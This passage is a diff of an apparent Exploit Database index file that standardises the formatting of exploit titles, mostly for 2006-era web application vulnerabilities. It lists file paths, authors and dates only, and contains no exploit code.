27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x AWstats.PL Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 sendim.cgi Multiple Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 imessage.cgi username Parameter XSS",2006-04-20,r0t,cgi,webapps,0 @@ -24778,7 +24778,7 @@ id,file,description,date,author,platform,type,port 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability",2006-04-27,codedreamer,windows,dos,0 -27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal vulnerability",2006-04-28,Sowhat,windows,remote,0 +27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel gate2.php - Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 @@ -24789,11 +24789,11 @@ id,file,description,date,author,platform,type,port 27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 27757,platforms/asp/webapps/27757.txt,"DUclassified Detail.ASP SQL Injection Vulnerability",2006-04-28,sadegh.sarshogh,asp,webapps,0 -27758,platforms/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal vulnerability",2006-04-28,Sowhat,windows,remote,0 -27759,platforms/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal vulnerability",2006-04-28,Sowhat,windows,remote,0 -27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal vulnerability",2006-04-28,Sowhat,windows,remote,0 +27758,platforms/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 +27759,platforms/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 +27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail NeoMail.PL SessionID Parameter Cross-Site Scripting Vulnerability",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 -27762,platforms/linux/dos/27762.txt,"LibTiff 3.x Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 +27762,platforms/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow Vulnerability",2006-04-28,"Tavis Ormandy",linux,dos,0 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption Vulnerability",2008-04-28,"Tavis Ormandy",linux,dos,0 @@ -24812,7 +24812,7 @@ id,file,description,date,author,platform,type,port 27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.PHP Remote File Include Vulnerability",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4images 1.7.1 top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4images 1.7.1 member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 -27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 +27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection Vulnerability",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.PHP Authentication Bypass Vulnerability",2006-04-29,tugr@,php,webapps,0 27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.PHP Remote File Include Vulnerability",2006-05-01,beford,php,webapps,0 @@ -24836,18 +24836,18 @@ id,file,description,date,author,platform,type,port 27803,platforms/php/webapps/27803.txt,"321soft PhP-Gallery 0.9 - index.php path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PhP-Gallery 0.9 index.php path Parameter XSS",2006-05-03,d4igoro,php,webapps,0 27805,platforms/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Stored XSS",2013-08-23,loneferret,windows,remote,0 -27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2 .51817/1.5.2 .50209 Remote Buffer Overflow Vulnerability",2006-05-03,"Gyu Tae",windows,remote,0 +27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2 .51817/1.5.2 .50209 - Remote Buffer Overflow Vulnerability",2006-05-03,"Gyu Tae",windows,remote,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.PHP Remote File Include Vulnerability",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 dlisting.php cid Parameter XSS",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 Linkliste.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 -27813,platforms/asp/webapps/27813.txt,"CyberBuild 0 login.asp SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 -27814,platforms/asp/webapps/27814.txt,"CyberBuild 0 browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 -27815,platforms/asp/webapps/27815.txt,"CyberBuild 0 login.asp SessionID Parameter XSS",2006-05-03,r0t,asp,webapps,0 -27816,platforms/asp/webapps/27816.txt,"CyberBuild 0 browse0.htm ProductIndex Parameter XSS",2006-05-03,r0t,asp,webapps,0 -27817,platforms/asp/webapps/27817.txt,"CyberBuild 0 result.asp Multiple Parameter XSS",2006-05-03,r0t,asp,webapps,0 +27813,platforms/asp/webapps/27813.txt,"CyberBuild - login.asp SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27815,platforms/asp/webapps/27815.txt,"CyberBuild - login.asp SessionID Parameter XSS",2006-05-03,r0t,asp,webapps,0 +27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter XSS",2006-05-03,r0t,asp,webapps,0 +27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter XSS",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 Index.PHP SQL Injection Vulnerability",2006-05-04,almaster,php,webapps,0 27819,platforms/php/webapps/27819.txt,"CuteNews 1.4.1 search.php Multiple Parameter XSS",2006-05-05,NST,php,webapps,0 27820,platforms/windows/remote/27820.txt,"Cryptomathic ActiveX Control Remote Buffer Overflow Vulnerability",2006-05-05,"Dennis Rand",windows,remote,0 @@ -24876,8 +24876,8 @@ id,file,description,date,author,platform,type,port 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.PHP SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0 -27846,platforms/asp/webapps/27846.txt,"EImagePro 0 - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 -27848,platforms/php/webapps/27848.txt,"EImagePro 0 view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 +27846,platforms/asp/webapps/27846.txt,"EImagePro - - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta ",windows,dos,0 27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 @@ -24890,16 +24890,16 @@ id,file,description,date,author,platform,type,port 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 charts.php id Parameter XSS",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 Vname Parameter Cross-Site Scripting Vulnerability",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 Chat.PHP Cross-Site Scripting Vulnerability",2006-05-12,Mr-X,php,webapps,0 -27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 0 NmConsole/Navigation.asp sDeviceView Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 -27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 0 NmConsole/ToolResults.asp sHostname Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 +27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 +27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter XSS",2006-05-12,"David Maciejak",asp,remote,0 27863,platforms/php/webapps/27863.txt,"PHPBB 2.0.20 Unauthorized HTTP Proxy Vulnerability",2006-05-12,rgod,php,webapps,0 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 index.php rep Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 diapo.php rep Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 affich.php image Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 index.php rep Variable Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 CFG[popphoto_base_path] Parameter Remote File Include Vulnerability",2006-05-15,VietMafia,php,webapps,0 -27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction 0 item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 -27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction 0 email_request.php user_id Parameter XSS",2006-05-15,Luny,php,webapps,0 +27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 +27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - email_request.php user_id Parameter XSS",2006-05-15,Luny,php,webapps,0 27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0 27872,platforms/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0 27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - RCE PoC",2013-08-26,Aodrulez,hardware,remote,0 @@ -24933,8 +24933,8 @@ id,file,description,date,author,platform,type,port 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service Vulnerability",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 Arbitrary Shell Command Execution Vulnerability",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String Vulnerability",2006-05-23,KaDaL-X,linux,dos,0 -27904,platforms/php/webapps/27904.txt,"DoceboLMS 2.0.x/3.0.x,DoceboKMS 3.0.3,Docebo CMS 3.0.x Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 -27905,platforms/php/webapps/27905.txt,"DoceboLMS 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 +27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x,DoceboKms 3.0.3,Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 +27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2006-05-26,"Thomas Waldegger",windows,dos,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.PHP SQL Injection Vulnerability",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.PHP Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 @@ -24943,7 +24943,7 @@ id,file,description,date,author,platform,type,port 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0 27912,platforms/php/webapps/27912.txt,"CoolPHP Index.PHP Cross-Site Scripting Vulnerability",2006-05-27,black-code,php,webapps,0 27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 Your_Account.ASP Multiple SQL Injection Vulnerabilities",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 -27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 Remote Pre-Authentication IMAP Buffer Overflow Vulnerability",2006-05-29,kcope,windows,dos,0 +27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Vulnerability",2006-05-29,kcope,windows,dos,0 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 SMTP Denial of Service Vulnerability",2006-05-29,y3dips,multiple,dos,0 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-05-29,black-code,php,webapps,0 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 tiki-lastchanges.php Multiple Parameter XSS",2006-05-29,Blwood,php,webapps,0 @@ -24956,7 +24956,7 @@ id,file,description,date,author,platform,type,port 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 Index.PHP Cross-Site Scripting Vulnerability",2006-05-31,Jokubas,php,webapps,0 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service Vulnerability",2006-05-31,"Tony Griffiths",linux,dos,0 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.PHP Local File Include Vulnerability",2006-05-31,darkgod,php,webapps,0 -27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x Multiple Remote File Include Vulnerabilities",2005-05-31,ERNE,php,webapps,0 +27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Include Vulnerabilities",2005-05-31,ERNE,php,webapps,0 27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.PHP Remote File Include Vulnerability",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.PHP SQL Injection Vulnerability",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability",2006-05-31,Mr.Niega,windows,dos,0 @@ -24983,7 +24983,7 @@ id,file,description,date,author,platform,type,port 27954,platforms/php/webapps/27954.txt,"ovidentia 5.6.x/5.8 search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27955,platforms/php/webapps/27955.txt,"ovidentia 5.6.x/5.8 posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27956,platforms/php/webapps/27956.txt,"ovidentia 5.6.x/5.8 options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x Multiple Remote File Include Vulnerabilities",2006-06-02,ERNE,php,webapps,0 +27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Include Vulnerabilities",2006-06-02,ERNE,php,webapps,0 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 Viewmsg.ASP SQL Injection Vulnerability",2006-06-02,ajann,asp,webapps,0 @@ -25004,7 +25004,7 @@ id,file,description,date,author,platform,type,port 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 index.php catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 UserName SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 Comments.PHP SQL Injection Vulnerability",2006-06-05,ajann,php,webapps,0 -27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 Remote Denial of Service Vulnerability",2006-06-06,"Xavier Roche",linux,dos,0 +27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service Vulnerability",2006-06-06,"Xavier Roche",linux,dos,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 Index.PHP Cross-Site Scripting Vulnerability",2006-06-06,Luny,php,webapps,0 27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 Private.PHP Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability",2006-06-13,"Will Dormann",windows,remote,0 @@ -25014,7 +25014,7 @@ id,file,description,date,author,platform,type,port 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 galsecurity.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.PHP SQL Injection Vulnerability",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 -27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 +27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow Vulnerability",2006-06-08,"Josh Bressers",unix,remote,0 27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service Vulnerability",2006-06-08,"Josh Bressers",multiple,dos,0 27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 publication_index.php tf_lang Parameter XSS",2006-06-07,r0t,php,webapps,0 @@ -25029,13 +25029,13 @@ id,file,description,date,author,platform,type,port 28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 albums.asp albumid Parameter XSS",2006-06-09,r0t,asp,webapps,0 28004,platforms/asp/webapps/28004.txt,"KAPhotoservice 7.5 edtalbum.asp Multiple Parameter XSS",2006-06-09,r0t,asp,webapps,0 28005,platforms/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability",2006-06-13,"Daniel Fabian",windows,remote,0 -28006,platforms/php/webapps/28006.txt,"NPDS 5.10 Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps,0 +28006,platforms/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps,0 28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 URI Handler Remote Arbitrary File Access Vulnerability",2006-06-12,"Jelmer Kuperus",windows,remote,0 -28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0 -28009,platforms/php/webapps/28009.txt,"Five Star Review Script 0 index2.php sort Parameter XSS",2006-06-12,Luny,php,webapps,0 -28010,platforms/php/webapps/28010.txt,"Five Star Review Script 0 report.php item_id Parameter XSS",2006-06-12,Luny,php,webapps,0 +28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0 +28009,platforms/php/webapps/28009.txt,"Five Star Review Script - index2.php sort Parameter XSS",2006-06-12,Luny,php,webapps,0 +28010,platforms/php/webapps/28010.txt,"Five Star Review Script - report.php item_id Parameter XSS",2006-06-12,Luny,php,webapps,0 28011,platforms/php/webapps/28011.txt,"iFoto 0.20 Index.PHP Cross-Site Scripting Vulnerability",2006-06-12,Luny,php,webapps,0 -28012,platforms/php/webapps/28012.txt,"Foing 0.x Remote File Include Vulnerability",2006-06-12,Darkfire,php,webapps,0 +28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Include Vulnerability",2006-06-12,Darkfire,php,webapps,0 28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 List.PHP Cross-Site Scripting Vulnerability",2006-06-12,Aesthetico,php,webapps,0 28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 Detail.PHP Directory Traversal Vulnerability",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 @@ -25045,13 +25045,13 @@ id,file,description,date,author,platform,type,port 28019,platforms/php/webapps/28019.txt,"Simpnews 2.x Wap_short_news.PHP Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 index.php imgdir Parameter XSS",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 popup.php Multiple Parameter XSS",2006-06-13,black-cod3,php,webapps,0 -28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x Multiple SQL Injection Vulnerabilities",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 +28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injection Vulnerabilities",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 FTP_index.PHP Cross-Site Scripting Vulnerability",2006-06-14,kr4ch,php,webapps,0 28024,platforms/php/webapps/28024.txt,"PhpBB BBRSS.PHP Remote File Include Vulnerability",2006-06-14,SpC-x,php,webapps,0 28025,platforms/php/webapps/28025.txt,"RahnemaCo Page.PHP Remote File Include Vulnerability",2006-06-14,Breeeeh,php,webapps,0 28026,platforms/linux/dos/28026.txt,"MySQL Server 4/5 Str_To_Date Remote Denial of Service Vulnerability",2006-06-14,Kanatoko,linux,dos,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Include Vulnerabilities",2006-06-14,"Federico Fazzi",php,webapps,0 -28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 +28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 LoginProxy.CGI Cross-Site Scripting Vulnerability",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.PHP Cross-Site Scripting Vulnerability",2006-06-15,"Federico Fazzi",php,webapps,0 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 Comment.php Cross-Site Scripting Vulnerability",2006-03-06,Luny,php,webapps,0 @@ -25086,7 +25086,7 @@ id,file,description,date,author,platform,type,port 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 Search.PHP Cross-Site Scripting Vulnerability",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 index.php Cross-Site Scripting Vulnerability",2006-03-06,alijsb,php,webapps,0 28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service Vulnerability",2006-06-19,n00b,multiple,dos,0 -28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 +28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 28067,platforms/php/webapps/28067.txt,"singapore 0.9.x/0.10 index.php template Parameter XSS",2006-06-19,simo64,php,webapps,0 28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - mail/reply.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 @@ -25098,7 +25098,7 @@ id,file,description,date,author,platform,type,port 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x Parse_User_ID Remote Buffer Overflow Vulnerability",2006-06-20,"Evgeny Legerov",linux,dos,0 -28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0 +28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML Injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 @@ -25139,10 +25139,10 @@ id,file,description,date,author,platform,type,port 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 Admin.PHP Remote File Include Vulnerability",2006-06-27,botan,php,webapps,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability",2006-06-27,"Plebo Aesdi 